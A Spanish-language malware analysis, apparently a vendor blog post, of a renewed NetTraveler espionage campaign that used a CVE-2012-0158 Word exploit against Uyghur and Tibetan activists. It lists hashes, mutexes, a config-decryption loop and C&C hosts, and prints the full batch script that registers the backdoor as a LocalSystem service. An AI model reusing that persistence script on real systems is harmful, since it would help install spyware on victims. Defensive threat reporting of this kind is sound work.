El ataque APT NetTraveler se renueva a sus 10 años

Ya hemos escrito antes sobre NetTraveler aquí y aquí.

A principios de este año observamos un alza en el número de ataques lanzados contra activistas uigures y tibetanos a través de una versión actualizada de la puerta trasera NetTraveler.

Este es un ejemplo de un ataque dirigido tipo spear-phishing mediante correo contra activistas uigures en marzo de este año.

nettraveler_1

El mensaje de correo tiene dos adjuntos, uno es un archivo JPG inofensivo, y el otro es un archivo .doc de Microsoft Word, de 373KB.

Nombre de archivo "Sabiq sot xadimi gulnar abletning qeyin-Qistaqta olgenliki ashkarilanmaqta.doc"
MD5 b2385963d3afece16bd7478b4cf290ce
Tamaño 381.667 bytes

El archivo .doc, que en realidad es un contenedor “Página web de un solo archivo”, también conocido como “Archivo web comprimido”, parece que se creó en un sistema utilizando Microsoft Office – Chino simplificado.

Contiene un exploit para la vulnerabilidad CVE-2012-0158 que los productos de Kaspersky Lab detectan como Exploit.MSWord.CVE-2012-0158.db.

Si se ejecuta en una versión vulnerable de Microsoft Office, descarga el módulo principal como “net.exe” (los productos de Kaspersky Lab lo detectan como Trojan-Dropper.Win32.Agent.lifr), que a su vez instala otros archivos. El módulo principal de C&C se descarga en “%SystemRoot%system32Windowsupdataney.dll”, (los productos de Kaspersky Lab lo detectan como Trojan-Spy.Win32.TravNet.qfr).

Nombre WINDOWSUPDATANEY.DLL
MD5 c13c79ad874215cfec8d318468e3d116
Tamaño 37.888 bytes

Está registrado como un servicio (llamado “Windowsupdata”) a través de un archivo Windows Batch llamado “DOT.BAT” (los productos de Kaspersky Lab lo detectan como Trojan.BAT.Tiny.b):

@echo off

@reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionSvchost" /v Windowsupdata /t REG_MULTI_SZ /d Windowsupdata /f
@reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesWindowsupdata" /v ImagePath /t REG_EXPAND_SZ /d %SystemRoot%System32svchost.exe -k Windowsupdata /f
@reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesWindowsupdata" /v DisplayName /t REG_SZ /d Windowsupdata /f
@reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesWindowsupdata" /v ObjectName /t REG_SZ /d LocalSystem /f
@reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesWindowsupdata" /v ErrorControl /t REG_DWORD /d 1 /f
@reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesWindowsupdata" /v Start /t REG_DWORD /d 2 /f
@reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesWindowsupdataParameters" /v ServiceDll /t REG_EXPAND_SZ /d %SystemRoot%system32Windowsupdataney.dll /f

Para asegurarse de que el malware no se ejecute múltiples veces, utiliza el mutex “SD_2013 Is Running!” para señalar su presencia en el sistema.š šEntre los mutex conocidos que utilizan las variantes antiguas y nuevas, están:

  • Boat-12 Is Running!
  • DocHunter2012 Is Running!
  • Hunter-2012 Is Running!
  • NT-2012 Is Running!
  • NetTravler Is Running!
  • NetTravler2012 Is Running!
  • SH-2011 Is Running!
  • ShengHai Is Running!
  • SD2013 is Running!

El archivo de configuración del programa malicioso está escrito en la carpeta “SYSTEM” (en contraste con SYSTEM32) y posee un nuevo formato un poco más liviano en comparación a las versiones “más antiguas” de NetTraveler:

nettraveler_2

Recordemos que un archivo de configuración antiguo de NetTraveler luce así:

nettraveler_3

Resulta obvio que los responsables de NetTraveler han tomado las medidas necesarias para ocultar la configuración de este programa malicioso. Afortunadamente, no es difícil descifrarlo.

El algoritmo es como sigue:

for (i=0;i<string_size;i++)
decrypted[i]=encrypted[i] – (i + 0xa);

Una vez descifrado, el nuevo config luce así:

nettraveler_4

Podemos identificar claramente el servidor de comando y control (C&C) en la captura de pantalla de arriba: “uyghurinfo[.]com”.

Hemos detectado varias muestras con este nuevo esquema de cifrado. A continuación presentamos una lista de todos los servidores C&C extraídos:

Servidor C&C IP Localización IP Registro
ssdcru.com 103.30.7.77 Hong Kong, Albert Heng, Trillion Company SHANGHAI MEICHENG TECHNOLOGY
uygurinfo.com 216.83.32.29 United States, Los Angeles, Integen Inc TODAYNIC.COM
INC.
samedone.com 122.10.17.130 Hong Kong, Kowloon, Hongkong Dingfengxinhui Bgp Datacenter SHANGHAI MEICHENG TECHNOLOGY
gobackto.net 103.1.42.1 Hong Kong, Sun Network (hong Kong) Limited SHANGHAI MEICHENG TECHNOLOGY
worksware.net N/A N/A SHANGHAI MEICHENG TECHNOLOGY
jojomic.com was
202.146.219.14
Hong Kong, Sun Network (hong Kong) Limited SHANGHAI MEICHENG TECHNOLOGY
angellost.net was 103.17.117.201 hong kong hung tai international holdings SHANGHAI MEICHENG TECHNOLOGY
husden.com was 103.30.7.76 hong kong hung tai international holdings SHANGHAI MEICHENG TECHNOLOGY

Te recomendamos bloquear todos estos hosts en tu cortafuegos.

Conclusión

Este año, los responsables de NetTraveler celebran 10 años de actividad. Aunque las muestras iniciales que descubrimos parecen haberse compilado en 2005, hay indicios que señalan a 2004 como el año en el comenzó su actividad.

nettraveler_5

Durante 10 años NetTraveler ha atacado a varios sectores, especialmente a blancos diplomáticos, gubernamentales y militares.

nettraveler_6

Víctimas de NetTraveler por sector

Últimamente, los principales objetivos de las actividades de ciberespionaje han sido la exploración espacial, la nanotecnología, la producción de energía, la energía nuclear, los láseres, la medicina y las comunicaciones.

El ataque contra los activistas uigures y tibetanos queda como un componente estándar de sus actividades y podemos suponer que se mantendrá, quizás, por los próximos 10 años.

Publicaciones relacionadas

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *